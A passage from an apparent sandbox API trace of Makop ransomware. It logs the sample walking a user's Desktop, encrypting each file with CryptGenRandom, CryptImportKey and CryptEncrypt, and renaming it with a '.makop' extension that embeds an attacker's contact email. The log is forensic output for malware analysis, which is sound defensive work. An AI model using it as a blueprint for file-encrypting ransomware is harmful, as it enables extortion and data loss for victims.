lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.518] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.518] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.518] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.518] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.519] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.519] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.519] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.519] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x1627f, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x1627f, lpOverlapped=0x0) returned 1 [0128.520] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x16280, dwBufLen=0x16280 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x16280) returned 1 [0128.521] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.522] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x16280, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x16280, lpOverlapped=0x0) returned 1 [0128.522] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.522] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x16364, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.522] SetEndOfFile (hFile=0xac) returned 1 [0128.526] GetProcessHeap () returned 0x550000 [0128.526] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0128.526] GetProcessHeap () returned 0x550000 [0128.527] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.527] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vHnU2xHSEd4BF b.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vhnu2xhsed4bf b.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vHnU2xHSEd4BF b.pps.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vhnu2xhsed4bf b.pps.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.535] CloseHandle (hObject=0xac) returned 1 [0128.535] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7a9acd0, ftCreationTime.dwHighDateTime=0x1d5de80, ftLastAccessTime.dwLowDateTime=0x93c1c210, ftLastAccessTime.dwHighDateTime=0x1d5dd87, ftLastWriteTime.dwLowDateTime=0x93c1c210, ftLastWriteTime.dwHighDateTime=0x1d5dd87, nFileSizeHigh=0x0, nFileSizeLow=0x4b18, dwReserved0=0x0, dwReserved1=0xffff, cFileName="VppPvk7.gif", cAlternateFileName="")) returned 1 [0128.535] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VppPvk7.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vpppvk7.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.535] GetProcessHeap () returned 0x550000 [0128.535] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.535] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.535] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.536] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.537] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.537] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.537] GetProcessHeap () returned 0x550000 [0128.537] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.537] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.537] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.537] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.537] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.538] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.538] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.538] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.538] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.538] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.538] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.539] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.539] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x4b18, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x4b18, lpOverlapped=0x0) returned 1 [0128.539] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x4b20, dwBufLen=0x4b20 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x4b20) returned 1 [0128.539] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.539] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x4b20, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x4b20, lpOverlapped=0x0) returned 1 [0128.540] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.540] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x4bf4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.540] SetEndOfFile (hFile=0xac) returned 1 [0128.543] GetProcessHeap () returned 0x550000 [0128.543] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.543] GetProcessHeap () returned 0x550000 [0128.543] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.543] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VppPvk7.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vpppvk7.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VppPvk7.gif.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vpppvk7.gif.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.549] CloseHandle (hObject=0xac) returned 1 [0128.550] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x602a2f40, ftCreationTime.dwHighDateTime=0x1d5e2ab, ftLastAccessTime.dwLowDateTime=0x9872ee10, ftLastAccessTime.dwHighDateTime=0x1d5e4da, ftLastWriteTime.dwLowDateTime=0x9872ee10, ftLastWriteTime.dwHighDateTime=0x1d5e4da, nFileSizeHigh=0x0, nFileSizeLow=0x17d5, dwReserved0=0x0, dwReserved1=0xffff, cFileName="z2EOMSuQr22om.rtf", cAlternateFileName="Z2EOMS~1.RTF")) returned 1 [0128.550] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z2EOMSuQr22om.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z2eomsuqr22om.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.550] GetProcessHeap () returned 0x550000 [0128.550] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.550] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.550] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.550] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xb, lpOverlapped=0x0) returned 1 [0128.552] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.552] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.552] GetProcessHeap () returned 0x550000 [0128.552] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.552] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.552] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.552] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.552] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.552] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.553] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.553] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.553] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.553] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.553] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.553] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.553] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x17d5, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x17d5, lpOverlapped=0x0) returned 1 [0128.553] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x17e0, dwBufLen=0x17e0 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x17e0) returned 1 [0128.553] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.554] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x17e0, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x17e0, lpOverlapped=0x0) returned 1 [0128.554] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.554] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x18b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.554] SetEndOfFile (hFile=0xac) returned 1 [0128.557] GetProcessHeap () returned 0x550000 [0128.557] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566d90 | out: hHeap=0x550000) returned 1 [0128.557] GetProcessHeap () returned 0x550000 [0128.557] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.557] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z2EOMSuQr22om.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z2eomsuqr22om.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\z2EOMSuQr22om.rtf.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z2eomsuqr22om.rtf.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.568] CloseHandle (hObject=0xac) returned 1 [0128.568] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f70e880, ftCreationTime.dwHighDateTime=0x1d5e186, ftLastAccessTime.dwLowDateTime=0x6d507950, ftLastAccessTime.dwHighDateTime=0x1d5da35, ftLastWriteTime.dwLowDateTime=0x6d507950, ftLastWriteTime.dwHighDateTime=0x1d5da35, nFileSizeHigh=0x0, nFileSizeLow=0x5f41, dwReserved0=0x0, dwReserved1=0xffff, cFileName="zIepH7_3z7-OHFnaUr5.flv", cAlternateFileName="ZIEPH7~1.FLV")) returned 1 [0128.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zIepH7_3z7-OHFnaUr5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zieph7_3z7-ohfnaur5.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.568] GetProcessHeap () returned 0x550000 [0128.569] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.569] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.569] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.569] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0xf, lpOverlapped=0x0) returned 1 [0128.570] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.570] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.570] GetProcessHeap () returned 0x550000 [0128.570] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x50) returned 0x56d278 [0128.570] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50, dwBufLen=0x50 | out: pbData=0x56d278*, pdwDataLen=0x245fc78*=0x50) returned 1 [0128.570] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.570] WriteFile (in: hFile=0xac, lpBuffer=0x56d278*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56d278*, lpNumberOfBytesWritten=0x245fc90*=0x50, lpOverlapped=0x0) returned 1 [0128.570] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.571] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.571] WriteFile (in: hFile=0xac, lpBuffer=0x56c928*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x56c928*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.571] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.571] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.571] CryptImportKey (in: hProv=0x564928, pbData=0x56cba8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.571] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.571] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.571] ReadFile (in: hFile=0xac, lpBuffer=0x2250020, nNumberOfBytesToRead=0x5f41, lpNumberOfBytesRead=0x245fc9c, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesRead=0x245fc9c*=0x5f41, lpOverlapped=0x0) returned 1 [0128.572] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2250020*, pdwDataLen=0x245fc78*=0x5f50, dwBufLen=0x5f50 | out: pbData=0x2250020*, pdwDataLen=0x245fc78*=0x5f50) returned 1 [0128.572] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.572] WriteFile (in: hFile=0xac, lpBuffer=0x2250020*, nNumberOfBytesToWrite=0x5f50, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x2250020*, lpNumberOfBytesWritten=0x245fc90*=0x5f50, lpOverlapped=0x0) returned 1 [0128.572] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.572] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x6034, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.573] SetEndOfFile (hFile=0xac) returned 1 [0128.575] GetProcessHeap () returned 0x550000 [0128.575] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56d278 | out: hHeap=0x550000) returned 1 [0128.575] GetProcessHeap () returned 0x550000 [0128.575] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x566008 | out: hHeap=0x550000) returned 1 [0128.576] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zIepH7_3z7-OHFnaUr5.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zieph7_3z7-ohfnaur5.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zIepH7_3z7-OHFnaUr5.flv.[4B2E4630].[akzhq530@protonmail.com].makop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zieph7_3z7-ohfnaur5.flv.[4b2e4630].[akzhq530@protonmail.com].makop")) returned 1 [0128.578] CloseHandle (hObject=0xac) returned 1 [0128.579] FindNextFileW (in: hFindFile=0x5699c8, lpFindFileData=0x245fd20 | out: lpFindFileData=0x245fd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3dacaf0, ftCreationTime.dwHighDateTime=0x1d5e50b, ftLastAccessTime.dwLowDateTime=0x422be6d0, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x422be6d0, ftLastWriteTime.dwHighDateTime=0x1d5dc77, nFileSizeHigh=0x0, nFileSizeLow=0xf98, dwReserved0=0x0, dwReserved1=0xffff, cFileName="zobaBSN5U.m4a", cAlternateFileName="ZOBABS~1.M4A")) returned 1 [0128.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\zobaBSN5U.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zobabsn5u.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0128.579] GetProcessHeap () returned 0x550000 [0128.579] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x566008 [0128.579] CryptGenRandom (in: hProv=0x564928, dwLen=0x10, pbBuffer=0x566008 | out: pbBuffer=0x566008) returned 1 [0128.579] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb0 | out: lpNewFilePointer=0x0) returned 1 [0128.579] WriteFile (in: hFile=0xac, lpBuffer=0x245fcc0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fcc0*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.580] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x245fc94 | out: phKey=0x245fc94*=0x56c880) returned 1 [0128.580] CryptSetKeyParam (hKey=0x56c880, dwParam=0x1, pbData=0x566008, dwFlags=0x0) returned 1 [0128.580] GetProcessHeap () returned 0x550000 [0128.580] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x566d90 [0128.580] CryptEncrypt (in: hKey=0x56c880, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40, dwBufLen=0x40 | out: pbData=0x566d90*, pdwDataLen=0x245fc78*=0x40) returned 1 [0128.581] CryptDestroyKey (hKey=0x56c880) returned 1 [0128.581] WriteFile (in: hFile=0xac, lpBuffer=0x566d90*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566d90*, lpNumberOfBytesWritten=0x245fc90*=0x40, lpOverlapped=0x0) returned 1 [0128.581] WriteFile (in: hFile=0xac, lpBuffer=0x245fc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fc98*, lpNumberOfBytesWritten=0x245fc90*=0x4, lpOverlapped=0x0) returned 1 [0128.581] WriteFile (in: hFile=0xac, lpBuffer=0x566008*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x566008*, lpNumberOfBytesWritten=0x245fc90*=0x10, lpOverlapped=0x0) returned 1 [0128.581] WriteFile (in: hFile=0xac, lpBuffer=0x569940*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x569940*, lpNumberOfBytesWritten=0x245fc90*=0x80, lpOverlapped=0x0) returned 1 [0128.581] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x245fcb8 | out: lpNewFilePointer=0x0) returned 1 [0128.581] WriteFile (in: hFile=0xac, lpBuffer=0x245fca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x245fc90, lpOverlapped=0x0 | out: lpBuffer=0x245fca8*, lpNumberOfBytesWritten=0x245fc90*=0x8, lpOverlapped=0x0) returned 1 [0128.581] CryptImportKey (in: hProv=0x564928, pbData=0x56ca58, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, 